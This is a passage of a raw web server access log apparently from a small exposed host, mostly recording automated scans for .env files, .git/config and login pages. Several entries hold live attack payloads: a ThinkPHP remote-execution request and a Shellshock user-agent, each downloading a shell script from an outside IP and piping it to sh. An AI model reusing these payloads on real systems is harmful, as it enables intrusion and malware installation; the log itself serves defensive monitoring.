(KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:16:37:44 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:16:40:03 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:16:44:09 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[22/Jan/2026:16:45:23 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 195.184.76.65] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:16:45:26 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.184.76.174] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" +[22/Jan/2026:16:47:09 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[22/Jan/2026:16:50:41 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:16:55:22 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:16:58:51 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:17:06:38 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:17:20:35 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:17:31:51 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:17:31:53 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.0 Safari/532.1" "-" +[22/Jan/2026:17:31:54 +0000] 404 - GET http 91.82.83.208 "/core/.env.key" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10" "-" +[22/Jan/2026:17:31:54 +0000] 404 - GET http 91.82.83.208 "/data/env.json" [Client 78.153.140.151] [Length 150] [Gzip -] "Mot-WX308/v3 BTSTLE_G_0A.22.11RPS Release/10.11.2011 Browser/Opera Profile/MIDP-2.0 Configuration/CLDC-1.1 Sync/SyncClient1.1 Opera/9.80 (MTK; Nucleus; Opera Mobi/4000; U; en-US) Presto/2.5.28 Version/10.10" "-" +[22/Jan/2026:17:31:54 +0000] 404 - GET http 91.82.83.208 "/core/.env.log" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/531.2+ (KHTML, like Gecko) Version/4.0.1 Safari/530.18" "-" +[22/Jan/2026:17:31:55 +0000] 404 - GET http 91.82.83.208 "/core/.env.old" [Client 78.153.140.151] [Length 150] [Gzip -] "Opera/7.11 (Windows NT 5.1; U) [en]" "-" +[22/Jan/2026:17:31:55 +0000] 404 - GET http 91.82.83.208 "/core/.env.pem" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "-" +[22/Jan/2026:17:31:55 +0000] 404 - GET http 91.82.83.208 "/dev/.env.smtp" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.2.2;en-gb; Lenovo B8000-F/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.2.2 Mobile Safari/534.30" "-" +[22/Jan/2026:17:31:55 +0000] 404 - GET http 91.82.83.208 "/dev/.env.test" [Client 78.153.140.151] [Length 150] [Gzip -] "Opera/9.80 (Linux armv7l ; U; CE-HTML/1.0 NETTV/4.1.1; en) Presto/2.6.33 Version/10.60" "-" +[22/Jan/2026:17:31:56 +0000] 404 - GET http 91.82.83.208 "/django/env.py" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.2.2; en-gb; SM-T110 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30" "-" +[22/Jan/2026:17:31:56 +0000] 404 - GET http 91.82.83.208 "/docs/.env.aws" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 6.0.1; SM-G900V Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.81 Mobile Safari/537.36" "-" +[22/Jan/2026:17:31:56 +0000] 404 - GET http 91.82.83.208 "/docs/.env.bak" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174" "-" +[22/Jan/2026:17:31:56 +0000] 404 - GET http 91.82.83.208 "/docs/.env.crt" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.85 Safari/537.36 OPR/41.0.2246.110204" "-" +[22/Jan/2026:17:31:56 +0000] 404 - GET http 91.82.83.208 "/docs/.env.dev" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:32.0) Gecko/20100101 Firefox/32.0" "-" +[22/Jan/2026:17:31:56 +0000] 404 - GET http 91.82.83.208 "/core/.env.tmp" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2503.0 Safari/537.36" "-" +[22/Jan/2026:17:31:57 +0000] 404 - GET http 91.82.83.208 "/docs/.env.gcp" [Client 78.153.140.151] [Length 150] [Gzip -] "Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00" "-" +[22/Jan/2026:17:31:57 +0000] 404 - GET http 91.82.83.208 "/core/.env.uat" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 6.0.1; 5056N Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36" "-" +[22/Jan/2026:17:31:57 +0000] 404 - GET http 91.82.83.208 "/docs/.env.key" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.2.2; en-gb; HTC_Desire_310 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[22/Jan/2026:17:31:57 +0000] 404 - GET http 91.82.83.208 "/docs/.env.log" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.28 Safari/537.36 OPR/27.0.1689.29 (Edition beta)" "-" +[22/Jan/2026:17:31:57 +0000] 404 - GET http 91.82.83.208 "/docs/.env.old" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; SGH-T999 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30evme-launcher" "-" +[22/Jan/2026:17:31:58 +0000] 404 - GET http 91.82.83.208 "/docs/.env.pem" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SCH-R530M Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[22/Jan/2026:17:31:58 +0000] 404 - GET http 91.82.83.208 "/docs/.env.tmp" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; sv-se) AppleWebKit/418.9 (KHTML, like Gecko) Safari/419.3" "-" +[22/Jan/2026:17:31:58 +0000] 404 - GET http 91.82.83.208 "/docs/.env.uat" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "-" +[22/Jan/2026:17:31:59 +0000] 400 - GET http 91.82.83.208 "/env.config.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[22/Jan/2026:17:31:59 +0000] 404 - GET http 91.82.83.208 "/env/debug.txt" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 OPR/48.0.2685.52" "-" +[22/Jan/2026:17:32:00 +0000] 404 - GET http 91.82.83.208 "/mail/.env.old" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.0.4) Gecko/2008111317 Ubuntu/8.04 (hardy) Firefox/3.0.4" "-" +[22/Jan/2026:17:32:00 +0000] 404 - GET http 91.82.83.208 "/env/mail.conf" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR) AppleWebKit/523.15 (KHTML, like Gecko) Version/3.0 Safari/523.15" "-" +[22/Jan/2026:17:32:01 +0000] 404 - GET http 91.82.83.208 "/env/mail.yaml" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B410 Safari/600.1.4 (Applebot/0.1; +http://www.apple.com/go/applebot)" "-" +[22/Jan/2026:17:32:01 +0000] 404 - GET http 91.82.83.208 "/crm/.env.dist" [Client 78.153.140.151] [Length 150] [Gzip -] "More Firefox 2.0.0.1 user agents strings -->>" "-" +[22/Jan/2026:17:32:01 +0000] 404 - GET http 91.82.83.208 "/env/main.conf" [Client 78.153.140.151] [Length 150] [Gzip -] "Nokia6630/1.0 (2.39.15) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1" "-" +[22/Jan/2026:17:32:01 +0000] 404 - GET http 91.82.83.208 "/env/relay.bak" [Client 78.153.140.151] [Length 150] [Gzip -] "Opera/9.80 (Windows 95; U; en) Presto/2.6.30 Version/10.63" "-" +[22/Jan/2026:17:32:01 +0000] 404 - GET http 91.82.83.208 "/env/relay.log" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)" "-" +[22/Jan/2026:17:32:12 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:17:32:32 +0000] 404 - GET http 91.82.83.208 "/wp-login.php" [Client 130.12.181.143] [Length 122] [Gzip 1.35] "python-requests/2.32.5" "-" +[22/Jan/2026:17:37:48 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 208.84.101.102] [Length 0] [Gzip -] "-" "-" +[22/Jan/2026:17:38:53 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 130.12.180.122] [Length 0] [Gzip -] "-" "-" +[22/Jan/2026:17:42:32 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:17:43:10 +0000] 200 - GET http 91.82.83.208 "/" [Client 45.194.92.199] [Length 1033] [Gzip -] "Hello World" "-" +[22/Jan/2026:17:44:43 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:17:58:42 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:18:03:11 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:18:11:19 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:18:22:55 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:18:23:18 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:18:33:58 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:18:38:30 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 205.210.31.198] [Length 1033] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[22/Jan/2026:18:39:04 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:18:45:54 +0000] 200 - GET http 91.82.83.208 "/" [Client 54.146.208.102] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[22/Jan/2026:18:58:58 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:19:07:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:19:12:57 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:19:16:55 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:19:18:49 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:19:23:34 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:19:24:58 +0000] 400 - GET http 91.82.83.208 "/.env" [Client 159.203.33.77] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[22/Jan/2026:19:24:58 +0000] 400 - GET http 91.82.83.208 "/.git/config" [Client 159.203.33.77] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[22/Jan/2026:19:28:33 +0000] 404 - POST http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[22/Jan/2026:19:28:34 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.%5Cdtm.sh%3F%3D6f71068b%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.%5Cdtm.sh%3F%3D6f71068b%7C%7Ccurl%20-s%20http%3A%2F%2F41.231.37.153%2Frondo.%5Cdtm.sh%3F%3D6f71068b%29%7Csh" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[22/Jan/2026:19:28:34 +0000] 404 - POST http 91.82.83.208 "/index.php?s=captcha" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[22/Jan/2026:19:28:34 +0000] 200 - GET http 91.82.83.208 "/" [Client 192.159.99.95] [Length 1033] [Gzip -] "() { :; }; /bin/bash -c \x22(wget -qO- http://41.231.37.153/rondo.\x5Cqre.sh?=6f71068b||busybox wget -qO- http://41.231.37.153/rondo.\x5Cqre.sh?=6f71068b||curl -s http://41.231.37.153/rondo.\x5Cqre.sh?=6f71068b)|sh\x22& # rondo2012@atomicmail.io" "-" +[22/Jan/2026:19:28:34 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 192.159.99.95] [Length 154] [Gzip -] "-" "-" +[22/Jan/2026:19:37:03 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:19:47:55 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.164.195.17] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[22/Jan/2026:19:50:13 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:19:58:55 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:20:00:51 +0000] 400 - GET http localhost "/" [Client 80.82.70.133] [Length 252] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Safari/605.1.15" "-" +[22/Jan/2026:20:01:34 +0000] 400 - GET http 91.82.83.208 "/" [Client 80.82.77.202] [Length 252] [Gzip -] "fasthttp" "-" +[22/Jan/2026:20:01:34 +0000] 400 - GET http 91.82.83.208 "/aaa9" [Client 80.82.77.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[22/Jan/2026:20:01:34 +0000] 400 - GET http 91.82.83.208 "/aab9" [Client 80.82.77.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[22/Jan/2026:20:01:45 +0000] 400 - GET http 91.82.83.208 "/aaa9" [Client 80.82.77.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[22/Jan/2026:20:01:46 +0000] 400 - GET http 91.82.83.208 "/aab9" [Client 80.82.77.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[22/Jan/2026:20:02:16 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:20:03:35 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:20:05:18 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:20:10:09 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36" "-" +[22/Jan/2026:20:15:44 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:20:23:21 +0000] 400 - GET http localhost "/" [Client 95.215.0.144] [Length 252] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.0; en-us; Droid Build/ESD20) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17" "-" +[22/Jan/2026:20:26:57 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:20:27:38 +0000] 404 - POST http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[22/Jan/2026:20:27:38 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.%5Cdtm.sh%3F%3D6f71068b%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.%5Cdtm.sh%3F%3D6f71068b%7C%7Ccurl%20-s%20http%3A%2F%2F41.231.37.153%2Frondo.%5Cdtm.sh%3F%3D6f71068b%29%7Csh" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[22/Jan/2026:20:27:38 +0000] 404 - POST http 91.82.83.208 "/index.php?s=captcha" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[22/Jan/2026:20:27:38 +0000] 200 - GET http 91.82.83.208 "/" [Client 192.159.99.95] [Length 1033] [Gzip -] "() { :; }; /bin/bash -c \x22(wget -qO- http://41.231.37.153/rondo.\x5Cqre.sh?=6f71068b||busybox wget -qO- http://41.231.37.153/rondo.\x5Cqre.sh?=6f71068b||curl -s http://41.231.37.153/rondo.\x5Cqre.sh?=6f71068b)|sh\x22& # rondo2012@atomicmail.io" "-" +[22/Jan/2026:20:27:38 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 192.159.99.95] [Length 0] [Gzip -] "-" "-" +[22/Jan/2026:20:30:30 +0000] 404 - GET http 91.82.83.208 "/geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0" [Client 204.76.203.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[22/Jan/2026:20:32:10 +0000] 404 - GET http 91.82.83.208 "/admin/config.php" [Client 102.22.20.125] [Length 150] [Gzip -] "xfa1,nvdorz,nvd0rz" "-" +[22/Jan/2026:20:41:47 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:20:45:21 +0000] 404 - GET http 91.82.83.208 "/druid/index.html" [Client 128.203.201.155] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[22/Jan/2026:20:50:42 +0000] 200 - GET http 91.82.83.208 "/" [Client 205.210.31.67] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[22/Jan/2026:20:52:11 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:20:54:02 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[22/Jan/2026:21:00:28 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 